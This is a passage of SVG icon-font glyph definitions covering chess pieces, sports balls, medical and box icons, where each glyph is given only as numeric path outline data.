    <glyph glyph-name="chess" unicode="&#xf439;" horiz-adv-x="514" 
d="M76.0996 237.8l-34.5996 95.1006c-2.7998 7.7998 3 16.0996 11.2998 16.0996h51.2002v30.2002h-21.5996c-3.30078 0 -6 2.7002 -6 6v22.3994c0 3.30078 2.69922 6 6 6h28.3994v28.4004c0 3.2998 2.7002 6 6 6h22.4004c3.2998 0 6 -2.7002 6 -6v-28.4004h28.3994
c3.30078 0 6 -2.69922 6 -6v-22.3994c0 -3.2998 -2.69922 -6 -6 -6h-21.5996v-30.2002h51.0996c8.30078 0 14.1006 -8.2998 11.3008 -16.0996l-34.6006 -95.1006h-103.7zM313.3 147.1c-1.09961 0.700195 -1.7002 1.90039 -1.89941 3.10059v69.8994
c0 2.2002 1.7998 3.90039 3.89941 3.90039h27.7002c2.2002 0 3.90039 -1.7998 3.90039 -3.90039v-31.5h22.6992v31.5c0 2.2002 1.80078 3.90039 3.90039 3.90039h52.9004c2.19922 0 3.89941 -1.7998 3.89941 -3.90039v-31.5h22.7002v31.5
c0 2.2002 1.7998 3.90039 3.90039 3.90039h27.6992c2.2002 0 3.90039 -1.7998 3.90039 -3.90039v-69.8994c0 -1.2998 -0.599609 -2.5 -1.7002 -3.2002l-24.8994 -16.9004c-0.100586 -18.1992 0.199219 -64 11.8994 -114.5h-147.5c11.7002 50.6006 12 96.4004 11.9004 114.5z
M384.8 95.0996h0.100586v-30.2998h30.2998v30.2998c0 8.40039 -6.7998 15.2002 -15.2002 15.2002s-15.2002 -6.7998 -15.2002 -15.2002zM504.6 -22.0996c1 -0.700195 1.5 -1.80078 1.5 -2.90039v-35c0 -2.2002 -1.7998 -3.90039 -3.89941 -3.90039h-204.5
c-2.2002 0 -3.90039 1.80078 -3.90039 3.90039v35c0 1.09961 0.600586 2.2998 1.5 3l13.7002 10.5996v15.6006c0 2.2002 1.7998 3.89941 3.90039 3.89941h174.199c2.2002 0 3.90039 -1.7998 3.90039 -3.89941v-15.6006zM244.8 -11.2998
c1.7998 -1.10059 2.7998 -3 2.7998 -5.10059v-41.5996c0 -3.2998 -2.69922 -6 -6 -6h-227.199c-3.30078 0 -6 2.7002 -6 6v41.5996c0 2.10059 1.09961 4 2.7998 5.10059l22.0996 14.2002v28.0996c0 3.2998 2.7002 6 6 6h177.4c3.2998 0 6 -2.7002 6 -6v-28.0996z
M199.8 197.6h-25.7998c0 -31.6992 -2.2002 -96.1992 17.4004 -153.199h-126.801c19.9004 58.0996 17.4004 124.399 17.4004 153.199h-25.7998c-3.2998 0 -6 2.7002 -6 6v20.8008c0 3.2998 2.7002 6 6 6h143.6c3.2998 0 6 -2.7002 6 -6v-20.8008c0 -3.2998 -2.7002 -6 -6 -6z
" />
    <glyph glyph-name="chess-bishop" unicode="&#xf43a;" horiz-adv-x="320" 
d="M123.158 370.119c-15.7891 5.35059 -27.1582 20.2842 -27.1582 37.8809c0 22.0908 17.9092 40 40 40h47.7959c22.0908 0 40 -17.9092 40 -40c0 -17.541 -11.2949 -32.4336 -27.0049 -37.8291c23.9932 -16.6572 48.5771 -46.8389 68.7031 -82.0498l-120.565 -120.564
c-0.969727 -0.969727 -1.75684 -2.87012 -1.75684 -4.24219s0.787109 -3.27246 1.75684 -4.24219l14.1426 -14.1426c0.969727 -0.969727 2.87012 -1.75684 4.24219 -1.75684s3.27246 0.787109 4.24219 1.75684l113.345 113.345
c17.7578 -38.2979 29.3711 -79.4434 29.3711 -114.273c0 -53.7861 -22.8975 -75.7881 -58.4463 -86.0332v-57.9678h-183.651v57.9697c-35.543 10.2461 -58.4346 32.249 -58.4346 86.0303c0 78.0293 58.2803 187.766 113.419 226.119zM320 -52
c0 -6.62695 -5.37305 -12 -12 -12h-296c-6.62695 0 -12 5.37305 -12 12v24c0 6.62695 5.37305 12 12 12h296c6.62695 0 12 -5.37305 12 -12v-24z" />
    <glyph glyph-name="chess-board" unicode="&#xf43c;" 
d="M192 192h64v-64h-64v64zM512 128h-64v64h64v-64zM0 256h64v-64h-64v64zM512 256h-64v64h64v-64zM512 0h-64v64h64v-64zM256 192v64h64v-64h-64zM0 -64v64h64v-64h-64zM128 -64v64h64v-64h-64zM384 448v-64h-64v64h64zM128 448v-64h-64v64h64zM256 -64v64h64v-64h-64z
M0 384h64v-64h-64v64zM0 128h64v-64h-64v64zM256 448v-64h-64v64h64zM384 -64v64h64v-64h-64zM64 64h64v-64h-64v64zM320 64h64v-64h-64v64zM256 256h-64v64h64v-64zM384 64v64h64v-64h-64zM128 192v-64h-64v64h64zM384 192v64h64v-64h-64zM512 448v-64h-64v64h64zM128 320
v-64h-64v64h64zM384 384h64v-64h-64v64zM192 64h64v-64h-64v64zM128 128h64v-64h-64v64zM256 128h64v-64h-64v64zM192 256v-64h-64v64h64zM320 320h-64v64h64v-64zM192 320h-64v64h64v-64zM320 256v64h64v-64h-64zM320 128v64h64v-64h-64z" />
    <glyph glyph-name="chess-king" unicode="&#xf43f;" horiz-adv-x="448" 
d="M416 -28v-24c0 -6.62695 -5.37305 -12 -12 -12h-360c-6.62695 0 -12 5.37305 -12 12v24c0 6.62695 5.37305 12 12 12h360c6.62695 0 12 -5.37305 12 -12zM407.967 296c27.5742 0 46.8789 -27.2441 37.7383 -53.2588l-85.2871 -242.741h-272.836l-85.2871 242.741
c-9.14062 26.0146 10.1641 53.2588 37.7383 53.2588h159.967v48h-50c-3.31152 0 -6 2.68848 -6 6v36c0 3.31152 2.68848 6 6 6h50v50c0 3.31152 2.68848 6 6 6h36c3.31152 0 6 -2.68848 6 -6v-50h50c3.31152 0 6 -2.68848 6 -6v-36c0 -3.31152 -2.68848 -6 -6 -6h-50v-48
h159.967z" />
    <glyph glyph-name="chess-knight" unicode="&#xf441;" horiz-adv-x="384" 
d="M352 224v-224h-320v46.5566c0 30.3027 17.1201 58.0029 44.2227 71.5547l57.2432 28.6221c14.6465 7.32324 26.5342 26.5566 26.5342 42.9326v0v50.334l-22.127 -11.0635c-5.4502 -2.72461 -11.0723 -9.7334 -12.5498 -15.6445l-11.835 -47.3379
c-0.822266 -3.28613 -4.04102 -6.97363 -7.18555 -8.23145l-29.6006 -11.8398c-1.18457 -0.473633 -3.18066 -0.858398 -4.45703 -0.858398c-1.40527 0 -3.58887 0.463867 -4.87305 1.03418l-60.2461 26.7744c-3.93359 1.74805 -7.12598 6.66113 -7.12598 10.9658v0v158.26
c0 6.36523 2.5293 12.4707 7.03027 16.9717l8.96973 8.96973l-14.2109 28.4219c-0.987305 1.97461 -1.78906 5.36914 -1.78906 7.57617v0.00195312c0 6.62695 5.37305 12 12 12h148c106.039 0 192 -85.9609 192 -192zM372 -16c6.62695 0 12 -5.37305 12 -12v-24
c0 -6.62695 -5.37305 -12 -12 -12h-360c-6.62695 0 -12 5.37305 -12 12v24c0 6.62695 5.37305 12 12 12h360zM52 320c-11.0459 0 -20 -8.9541 -20 -20s8.9541 -20 20 -20s20 8.9541 20 20s-8.9541 20 -20 20z" />
    <glyph glyph-name="chess-pawn" unicode="&#xf443;" horiz-adv-x="320" 
d="M264 0h-208s60 42.7432 60 176h-32c-6.62695 0 -12 5.37305 -12 12v24c0 6.62695 5.37305 12 12 12h40.209c-28.4883 13.4404 -48.209 42.4121 -48.209 76c0 46.3916 37.6084 84 84 84s84 -37.6084 84 -84c0 -33.5879 -19.7207 -62.5596 -48.209 -76h40.209
c6.62695 0 12 -5.37305 12 -12v-24c0 -6.62695 -5.37305 -12 -12 -12h-32c0 -133.257 60 -176 60 -176zM292 -16c6.62695 0 12 -5.37305 12 -12v-24c0 -6.62695 -5.37305 -12 -12 -12h-264c-6.62695 0 -12 5.37305 -12 12v24c0 6.62695 5.37305 12 12 12h264z" />
    <glyph glyph-name="chess-queen" unicode="&#xf445;" 
d="M436 -64h-360c-6.62695 0 -12 5.37305 -12 12v24c0 6.62695 5.37305 12 12 12h360c6.62695 0 12 -5.37305 12 -12v-24c0 -6.62695 -5.37305 -12 -12 -12zM255.579 448c30.9277 0 56 -25.0723 56 -56s-25.0723 -56 -56 -56s-56 25.0723 -56 56s25.0723 56 56 56z
M460.147 293.366l39.3564 -20.7734c3.53223 -1.86426 6.39941 -6.61816 6.39941 -10.6123c0 -1.29883 -0.398438 -3.33008 -0.889648 -4.53223l-105.014 -257.448h-288l-105.014 257.449c-0.491211 1.20215 -0.889648 3.2334 -0.889648 4.53223
c0 3.99414 2.86719 8.74805 6.39941 10.6123l39.1787 20.6797c5.6416 2.97754 12.6328 1.02637 15.8994 -4.45312c10.6074 -17.8018 23.7334 -38.0254 44.4248 -38.0254c28.7539 0 30.6357 19.8975 31.6875 57.5391c0.182617 6.49316 5.5 11.667 11.9951 11.667h41.0049
c5.17578 0 9.75488 -3.32812 11.3887 -8.23828c8.89062 -26.709 26.0732 -40.9912 47.9248 -40.9912s39.0352 14.2822 47.9248 40.9912c1.63379 4.91016 6.21289 8.23828 11.3887 8.23828h41.0059c6.49414 0 11.8115 -5.17188 11.9951 -11.6641
c1.06055 -37.7383 2.97168 -57.542 31.6855 -57.542c21.3184 0 35.4492 22.2852 44.0654 37.8008c3.16602 5.70215 10.3135 7.81543 16.082 4.77051z" />
    <glyph glyph-name="chess-rook" unicode="&#xf447;" horiz-adv-x="384" 
d="M81.2412 232.973l-45.4209 42.3154c-2.43652 2.26953 -3.82031 5.4502 -3.82031 8.78027v119.932c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-44h47.999v44c0 6.62695 5.37305 12 12 12h72c6.62695 0 12 -5.37305 12 -12v-44h48v44
c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-119.933v-0.000976562c0 -2.88184 -1.71094 -6.81543 -3.82031 -8.7793l-45.418 -42.3125c0.285156 -44.0625 3.82129 -133.371 33.2217 -232.975h-287.982c29.4111 99.9238 32.957 189.08 33.2412 232.973z
M160 192v-64.0039h64v64.0039c0 17.6729 -14.3271 32 -32 32s-32 -14.3271 -32 -32zM384 -28v-24c0 -6.62695 -5.37305 -12 -12 -12h-360c-6.62695 0 -12 5.37305 -12 12v24c0 6.62695 5.37305 12 12 12h360c6.62695 0 12 -5.37305 12 -12z" />
    <glyph glyph-name="dumbbell" unicode="&#xf44b;" horiz-adv-x="640" 
d="M104 352c13.2998 0 24 -10.7002 24 -24v-272c0 -13.2998 -10.7002 -24 -24 -24h-48c-13.2998 0 -24 10.7002 -24 24v104h-24c-4.40039 0 -8 3.59961 -8 8v48c0 4.40039 3.59961 8 8 8h24v104c0 13.2998 10.7002 24 24 24h48zM632 224c4.40039 0 8 -3.59961 8 -8v-48
c0 -4.40039 -3.59961 -8 -8 -8h-24v-104c0 -13.2998 -10.7002 -24 -24 -24h-48c-13.2998 0 -24 10.7002 -24 24v272c0 13.2998 10.7002 24 24 24h48c13.2998 0 24 -10.7002 24 -24v-104h24zM456 416c13.2998 0 24 -10.7002 24 -24v-400c0 -13.2998 -10.7002 -24 -24 -24h-48
c-13.2998 0 -24 10.7002 -24 24v168h-128v-168c0 -13.2998 -10.7002 -24 -24 -24h-48c-13.2998 0 -24 10.7002 -24 24v400c0 13.2998 10.7002 24 24 24h48c13.2998 0 24 -10.7002 24 -24v-168h128v168c0 13.2998 10.7002 24 24 24h48z" />
    <glyph glyph-name="football-ball" unicode="&#xf44e;" horiz-adv-x="496" 
d="M481.5 387.7c6.2998 -23.9004 13.7002 -61 14.5 -104.5l-156.6 156.8c43.5996 -0.900391 80.8994 -8.5 104.8 -14.9004c18.2002 -4.89941 32.5 -19.1992 37.2998 -37.3994zM14.5 -3.7002c-6.2998 23.9004 -13.7002 61 -14.5 104.5l156.6 -156.8
c-43.5996 0.900391 -80.8994 8.5 -104.8 14.9004c-18.2002 4.89941 -32.5 19.1992 -37.2998 37.3994zM4.2002 164.6c22.5996 152.7 138.899 252 271.399 271.4l216.301 -216.6c-22.7002 -152.7 -139 -252 -271.5 -271.4zM321.5 288.2l-28.2998 -28.5l-28.2998 28.2998
c-3.10059 3.09961 -8.2002 3.09961 -11.3008 0l-11.2998 -11.2998c-3.09961 -3.10059 -3.09961 -8.2002 0 -11.2998l28.2998 -28.3008l-22.5996 -22.5996l-28.2998 28.2998c-3.10059 3.10059 -8.2002 3.10059 -11.2998 0l-11.3008 -11.2998
c-3.09961 -3.09961 -3.09961 -8.2002 0 -11.2998l28.3008 -28.2998l-22.6006 -22.6006l-28.2998 28.2998c-3.09961 3.10059 -8.2002 3.10059 -11.2998 0l-11.2998 -11.2998c-3.10059 -3.09961 -3.10059 -8.2002 0 -11.2998l28.2998 -28.2002l-28.2998 -28.2998
c-3.10059 -3.09961 -3.10059 -8.2002 0 -11.2998l11.2998 -11.2998c3.09961 -3.10059 8.2002 -3.10059 11.2998 0l28.2998 28.2998l28.2998 -28.2998c3.10059 -3.10059 8.2002 -3.10059 11.3008 0l11.2998 11.2998c3.09961 3.09961 3.09961 8.2002 0 11.2998
l-28.2998 28.2998l22.5996 22.6006l28.2998 -28.3008c3.10059 -3.09961 8.2002 -3.09961 11.2998 0l11.3008 11.3008c3.09961 3.09961 3.09961 8.19922 0 11.2998l-28.3008 28.2998l22.6006 22.7002l28.2998 -28.2998c3.09961 -3.10059 8.2002 -3.10059 11.2998 0
l11.2998 11.2998c3.10059 3.09961 3.10059 8.2002 0 11.2998l-28.2998 28.2998l28.2998 28.2998c3.10059 3.10059 3.10059 8.2002 0 11.3008l-11.2998 11.2998c-3.09961 3.09961 -8.2002 3.09961 -11.2998 0z" />
    <glyph glyph-name="golf-ball" unicode="&#xf450;" horiz-adv-x="416" 
d="M96 32h224c0 -17.7002 -14.2998 -32 -32 -32h-16c-17.7002 0 -32 -14.2998 -32 -32v-20c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v20c0 17.7002 -14.2998 32 -32 32h-16c-17.7002 0 -32 14.2998 -32 32zM416 240
c0 -74.2002 -39 -139.2 -97.5 -176h-221c-58.5 36.7998 -97.5 101.8 -97.5 176c0 114.9 93.0996 208 208 208s208 -93.0996 208 -208zM235.9 196.1c18.2998 0 33.0996 14.8008 33.0996 33.1006c0 14.3994 -9.2998 26.2998 -22.0996 30.8994
c9.59961 -26.7998 -15.6006 -51.2998 -41.9004 -41.8994c4.59961 -12.7998 16.5 -22.1006 30.9004 -22.1006zM285 149.2c0 14.3994 -9.2998 26.2998 -22.0996 30.8994c9.59961 -26.7998 -15.6006 -51.2998 -41.9004 -41.8994
c4.59961 -12.7998 16.5 -22.1006 30.9004 -22.1006c18.2998 0 33.0996 14.9004 33.0996 33.1006zM349 213.2c0 14.3994 -9.2998 26.2998 -22.0996 30.8994c9.59961 -26.7998 -15.6006 -51.2998 -41.9004 -41.8994c4.59961 -12.7998 16.5 -22.1006 30.9004 -22.1006
c18.2998 0 33.0996 14.9004 33.0996 33.1006z" />
    <glyph glyph-name="hockey-puck" unicode="&#xf453;" 
d="M0 288c0 53 114.6 96 256 96s256 -43 256 -96s-114.6 -96 -256 -96s-256 43 -256 96zM0 205.8c113.5 -82.3994 398.6 -82.2998 512 0v-109.8c0 -53 -114.6 -96 -256 -96s-256 43 -256 96v109.8z" />
    <glyph glyph-name="quidditch" unicode="&#xf458;" horiz-adv-x="639" 
d="M256.5 231.2l86.7002 -109.2s-16.6006 -102.4 -76.6006 -150.1c-59.8994 -47.7002 -266.6 -34.1006 -266.6 -34.1006s3.7998 23.1006 11 55.4004l94.5996 112.2c4 4.69922 -0.899414 11.5996 -6.59961 9.5l-60.4004 -22.1006c14.4004 41.7002 32.7002 80 54.6006 97.5
c59.8994 47.7998 163.3 40.9004 163.3 40.9004zM494.5 96.2002c44 0 79.7998 -35.7002 79.7998 -79.9004c0 -44.0996 -35.7002 -79.8994 -79.7998 -79.8994s-79.7998 35.7998 -79.7998 79.8994c0 44.1006 35.7998 79.9004 79.7998 79.9004zM636.5 417
c5.5 -6.90039 4.40039 -17 -2.5 -22.5l-232.5 -177.9l34.0996 -42.8994c5.10059 -6.40039 1.7002 -15.9004 -6.2998 -17.6006l-58.7998 -12.3994l-86.7002 109.2l25.2998 54.5996c3.5 7.40039 13.5 8.59961 18.6006 2.2002l34.0996 -43l232.5 177.899
c6.90039 5.40039 16.9004 4.30078 22.4004 -2.59961z" />
    <glyph glyph-name="square-full" unicode="&#xf45c;" 
d="M512 -64h-512v512h512v-512z" />
    <glyph glyph-name="table-tennis" unicode="&#xf45d;" 
d="M496.2 151.5c-64.1006 43.2002 -149.5 27.9004 -195.601 -34.2002l-211.5 211.5l56 56.1006c83.9004 84.0996 220 84.0996 303.9 0c63 -63.1006 78.7002 -155.601 47.2002 -233.4zM278.3 71.7998c-3.7002 -12.7002 -6.2998 -25.8994 -6.2002 -39.7002
c0 -19.5 3.90039 -38.0996 11 -55.0996c-25.6992 2.7998 -50.5996 13.5996 -70.2998 33.2998l-35.7002 35.7002l-89.2998 -103.3c-7.5 -8.60059 -20.7002 -9.10059 -28.7002 -1l-53.3994 53.5c-8.10059 8.09961 -7.60059 21.2998 1 28.7998l103 89.4004l-34.5 34.5996
c-39 39.0996 -44.6006 98.7998 -17.2998 144.1zM416 128c53 0 96 -43 96 -96s-43 -96 -96 -96s-96 43 -96 96s43 96 96 96z" />
    <glyph glyph-name="volleyball-ball" unicode="&#xf45f;" horiz-adv-x="495" 
d="M223.3 204.6c-71.8994 -44.3994 -123.399 -113 -146.1 -192.199c-24 22.7998 -43.5 50.2998 -56.9004 81.0996c22.7998 94.4004 89.5 174.4 180.3 216.8c14.1006 -32.8994 21.8008 -68.7002 22.7002 -105.7zM186.4 339c-84 -39.5 -149 -108.4 -182.4 -191.5
c-19.7998 109.3 34 212.4 125 262.2c22.9004 -20.6006 42.4004 -44.2998 57.4004 -70.7002zM374 173.9c-35.5996 4.19922 -70.4004 15.5 -102.9 33.1992c-2.5 84.5 -36.1992 163.4 -93.5 222.7c47.3008 14 84.2002 10.2002 98.9004 8.5
c70.2002 -66.8994 106.1 -164.6 97.5 -264.399zM249.3 164.4c49.7002 -26.8008 104 -40.8008 158.601 -40.9004c27.1992 0 54.2998 3.7998 80.8994 10.4004c-8 -33.1006 -22.5 -63.5 -42.2002 -89.9004c-93 -27.2998 -195.5 -9.5 -277.5 47.7998
c21.5 28.7002 48.6006 53.2998 80.2002 72.6006zM151 64.7002c53.5996 -37.2998 144 -78.2002 256.9 -62.1006c-43.2002 -36.5 -98.9004 -58.5996 -159.9 -58.5996c-47.4004 0 -91.5 13.5 -129.1 36.5c6.39941 29.7998 16.8994 58.2002 32.0996 84.2002zM331.3 425.3
c95.9004 -34.2998 164.601 -125.6 164.601 -233.399c0 -2 -0.300781 -4 -0.300781 -6c-29.1992 -9.40039 -59.3994 -14.4004 -89.6992 -14.2002c7.89941 92.3994 -19.3008 183.2 -74.6006 253.6z" />
    <glyph glyph-name="allergies" unicode="&#xf461;" horiz-adv-x="448" 
d="M416 336c17.5996 0 32 -14.4004 32 -32v-176.1c-0.200195 -14 -1.90039 -28.6006 -5.09961 -42.3008l-26.5 -112.699c-5.10059 -21.7002 -24.4004 -37 -46.7002 -37h-197.601c-15.2998 0 -29.7998 7.39941 -38.7998 19.7998l-125.6 172.7
c-13 17.8994 -9.10059 42.8994 8.7998 55.8994s42.9004 9.10059 55.9004 -8.7998l23.5996 -32.5v241c0 17.5996 14.4004 32 32 32s32 -14.4004 32 -32v-152c0 -4.40039 3.59961 -8 8 -8h16c4.40039 0 8 3.59961 8 8v184c0 17.5996 14.4004 32 32 32s32 -14.4004 32 -32v-184
c0 -4.40039 3.59961 -8 8 -8h16c4.40039 0 8 3.59961 8 8v152c0 17.5996 14.4004 32 32 32s32 -14.4004 32 -32v-152c0 -4.40039 3.59961 -8 8 -8h16c4.40039 0 8 3.59961 8 8v72c0 17.5996 14.4004 32 32 32zM176 32c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16
s-16 -7.2002 -16 -16s7.2002 -16 16 -16zM176 128c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16zM240 0c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16zM240 96c8.7998 0 16 7.2002 16 16
s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16zM304 64c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16zM336 0c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16zM368 128
c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16s7.2002 -16 16 -16z" />
    <glyph glyph-name="band-aid" unicode="&#xf462;" horiz-adv-x="640" 
d="M0 288c0 35.2998 28.7002 64 64 64h96v-320h-96c-35.2998 0 -64 28.7002 -64 64v192zM576 352c35.2998 0 64 -28.7002 64 -64v-192c0 -35.2998 -28.7002 -64 -64 -64h-96v320h96zM192 32v320h256v-320h-256zM368 264c-13.2998 0 -24 -10.7002 -24 -24s10.7002 -24 24 -24
s24 10.7002 24 24s-10.7002 24 -24 24zM368 168c-13.2998 0 -24 -10.7002 -24 -24s10.7002 -24 24 -24s24 10.7002 24 24s-10.7002 24 -24 24zM272 264c-13.2998 0 -24 -10.7002 -24 -24s10.7002 -24 24 -24s24 10.7002 24 24s-10.7002 24 -24 24zM272 168
c-13.2998 0 -24 -10.7002 -24 -24s10.7002 -24 24 -24s24 10.7002 24 24s-10.7002 24 -24 24z" />
    <glyph glyph-name="box" unicode="&#xf466;" 
d="M509.5 263.4c0.799805 -2.40039 0.799805 -4.90039 1.2002 -7.40039h-238.7v192h141.4c20.6992 0 39 -13.2002 45.5 -32.7998zM240 448v-192h-238.7c0.400391 2.5 0.400391 5 1.2002 7.40039l50.5996 151.8c6.5 19.5996 24.8008 32.7998 45.5 32.7998h141.4zM0 224h512
v-240c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v240z" />
    <glyph glyph-name="boxes" unicode="&#xf468;" horiz-adv-x="576" 
d="M560 160c8.7998 0 16 -7.2002 16 -16v-192c0 -8.7998 -7.2002 -16 -16 -16h-224c-8.7998 0 -16 7.2002 -16 16v192c0 8.7998 7.2002 16 16 16h80v-96l32 21.2998l32 -21.2998v96h80zM176 224c-8.7998 0 -16 7.2002 -16 16v192c0 8.7998 7.2002 16 16 16h80v-96
l32 21.2998l32 -21.2998v96h80c8.7998 0 16 -7.2002 16 -16v-192c0 -8.7998 -7.2002 -16 -16 -16h-224zM240 160c8.7998 0 16 -7.2002 16 -16v-192c0 -8.7998 -7.2002 -16 -16 -16h-224c-8.7998 0 -16 7.2002 -16 16v192c0 8.7998 7.2002 16 16 16h80v-96l32 21.2998
l32 -21.2998v96h80z" />
    <glyph glyph-name="briefcase-medical" unicode="&#xf469;" 
d="M464 320c26.5 0 48 -21.5 48 -48v-288c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v288c0 26.5 21.5 48 48 48h80v48c0 26.5 21.5 48 48 48h160c26.5 0 48 -21.5 48 -48v-48h80zM192 352v-32h128v32h-128zM352 104v48c0 4.40039 -3.59961 8 -8 8h-56v56
c0 4.40039 -3.59961 8 -8 8h-48c-4.40039 0 -8 -3.59961 -8 -8v-56h-56c-4.40039 0 -8 -3.59961 -8 -8v-48c0 -4.40039 3.59961 -8 8 -8h56v-56c0 -4.40039 3.59961 -8 8 -8h48c4.40039 0 8 3.59961 8 8v56h56c4.40039 0 8 3.59961 8 8z" />
    <glyph glyph-name="burn" unicode="&#xf46a;" horiz-adv-x="384" 
d="M192 448c111.8 -100.9 192 -220.6 192 -300.5c0 -124.5 -79 -211.5 -192 -211.5s-192 87 -192 211.5c0 79.5996 79.7002 199.2 192 300.5zM192 0c56.5 0 96 39 96 94.7998c0 13.5 -4.59961 61.5 -96 161.2c-91.4004 -99.7002 -96 -147.7 -96 -161.2
c0 -55.7998 39.5 -94.7998 96 -94.7998z" />
    <glyph glyph-name="capsules" unicode="&#xf46b;" horiz-adv-x="575" 
d="M555.3 147.9c36.2002 -51.7002 23.7002 -123 -28 -159.2c-20 -14 -42.7998 -20.7002 -65.5 -20.7002c-36.0996 0 -71.5996 17 -93.7998 48.7998l-131.2 187.3c-5.5 7.90039 -9.5 16.4004 -12.7998 25v-149.1c0 -61.9004 -50.0996 -112 -112 -112s-112 50.0996 -112 112
v224c0 61.9004 50.0996 112 112 112c60 0 108.5 -47.2002 111.4 -106.5c7.7998 21 21.7998 40 41.5 53.7998c20 14 42.8994 20.7002 65.5 20.7002c36 0 71.5 -17 93.7998 -48.7998zM160 192v112c0 26.5 -21.5 48 -48 48s-48 -21.5 -48 -48v-112h96zM354.8 147.1
l82.5 57.7002l-65.5996 93.7002c-9.40039 13.5 -24.7998 21.5 -41.2998 21.5c-10.3008 0 -20.3008 -3.09961 -28.8008 -9.09961c-11 -7.7002 -18.3994 -19.3008 -20.6992 -32.5c-2.40039 -13.2002 0.599609 -26.6006 8.2998 -37.6006z" />
    <glyph glyph-name="clipboard-check" unicode="&#xf46c;" horiz-adv-x="384" 
d="M336 384c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h80c0 35.2998 28.7002 64 64 64s64 -28.7002 64 -64h80zM192 408c-13.2998 0 -24 -10.7002 -24 -24s10.7002 -24 24 -24s24 10.7002 24 24
s-10.7002 24 -24 24zM313.2 176.2c4.7002 4.7002 4.7998 12.2002 0.0996094 17l-28.2002 28.3994c-4.69922 4.7002 -12.2998 4.80078 -17 0.100586l-106 -105.2l-46 46.4004c-4.69922 4.69922 -12.2998 4.7998 -17 0.0996094l-28.3994 -28.2002
c-4.7002 -4.7002 -4.7998 -12.2998 -0.100586 -17l82.6006 -83.2998c4.7002 -4.7002 12.2998 -4.7998 17 -0.0996094z" />
    <glyph glyph-name="clipboard-list" unicode="&#xf46d;" horiz-adv-x="384" 
d="M336 384c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h80c0 35.2998 28.7002 64 64 64s64 -28.7002 64 -64h80zM96 24c13.2998 0 24 10.7002 24 24s-10.7002 24 -24 24s-24 -10.7002 -24 -24
s10.7002 -24 24 -24zM96 120c13.2998 0 24 10.7002 24 24s-10.7002 24 -24 24s-24 -10.7002 -24 -24s10.7002 -24 24 -24zM96 216c13.2998 0 24 10.7002 24 24s-10.7002 24 -24 24s-24 -10.7002 -24 -24s10.7002 -24 24 -24zM192 408c-13.2998 0 -24 -10.7002 -24 -24
s10.7002 -24 24 -24s24 10.7002 24 24s-10.7002 24 -24 24zM320 40v16c0 4.40039 -3.59961 8 -8 8h-144c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h144c4.40039 0 8 3.59961 8 8zM320 136v16c0 4.40039 -3.59961 8 -8 8h-144
c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h144c4.40039 0 8 3.59961 8 8zM320 232v16c0 4.40039 -3.59961 8 -8 8h-144c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h144c4.40039 0 8 3.59961 8 8z" />
    <glyph glyph-name="diagnoses" unicode="&#xf470;" horiz-adv-x="640" 
d="M496 192c-8.7998 0 -16 7.2002 -16 16s7.2002 16 16 16s16 -7.2002 16 -16s-7.2002 -16 -16 -16zM320 272c-48.5 0 -88 39.5 -88 88s39.5 88 88 88s88 -39.5 88 -88s-39.5 -88 -88 -88zM59.7998 84l-17.7002 26.7002c-8.7998 13.2998 -7.59961 34.5996 10 45.0996
c7.40039 4.40039 17.5 10 28.7002 16c31.6006 -27.2998 79 -4.2002 79.2002 36c47.0996 17.7002 103 32.2002 160 32.2002c45.0996 0 89.2998 -9.2002 129.2 -21.7998c-11.7002 -52.9004 59.5996 -81.2002 87.7002 -35.1006
c21.3994 -10.3994 39.1992 -20.2998 51.0996 -27.3994c17.5996 -10.5 18.7998 -31.9004 10 -45.1006l-17.7998 -26.6992c-10.2002 -15.1006 -29.2998 -17.8008 -42.9004 -9.80078c-16.2002 9.60059 -56.2002 31.8008 -105.3 48.6006v-90.7002h-224v90.7998
c-49.0996 -16.8994 -89.0996 -39 -105.3 -48.5996c-13.6006 -8 -32.7002 -5.5 -42.9004 9.7998zM368 104c-13.2998 0 -24 -10.7002 -24 -24s10.7002 -24 24 -24s24 10.7002 24 24s-10.7002 24 -24 24zM272 200c-13.2998 0 -24 -10.7002 -24 -24s10.7002 -24 24 -24
s24 10.7002 24 24s-10.7002 24 -24 24zM112 192c-8.7998 0 -16 7.2002 -16 16s7.2002 16 16 16s16 -7.2002 16 -16s-7.2002 -16 -16 -16zM624 0c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-608c-8.7998 0 -16 7.2002 -16 16v32
c0 8.7998 7.2002 16 16 16h608z" />
    <glyph glyph-name="dna" unicode="&#xf471;" horiz-adv-x="448" 
d="M0.0996094 -46.0996c5.2002 42.8994 31.4004 153.899 159.9 238.1c-128.6 84.2002 -154.7 195.2 -159.9 238.1c-1.09961 9.5 6.40039 17.8008 16 17.8008l32.3008 0.0996094c8.09961 0.0996094 14.8994 -5.90039 16 -13.9004
